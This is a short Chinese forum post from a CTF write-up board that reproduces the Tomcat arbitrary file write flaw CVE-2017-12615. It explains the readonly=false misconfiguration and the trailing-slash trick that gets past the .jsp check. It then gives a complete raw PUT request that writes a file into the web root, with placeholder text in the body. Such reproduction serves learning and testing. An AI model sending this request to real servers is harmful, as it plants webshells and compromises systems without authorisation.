Tomcat 漏洞复现
0x01 Tomcat 任意文件写入漏洞 CVE-2017-12615
漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件.
虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。
直接发送以下数据包即可在Web根目录写入shell:
PUT /1.jsp/ HTTP/1.1Host: your-ip:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 5this is shell
如下:
结果:
打赏我,让我更有动力~
登录后才可发表内容
返回首页
CTF&WP专版
yangroupaomo
发表于 2021-10-15
666
评论列表
加载数据中...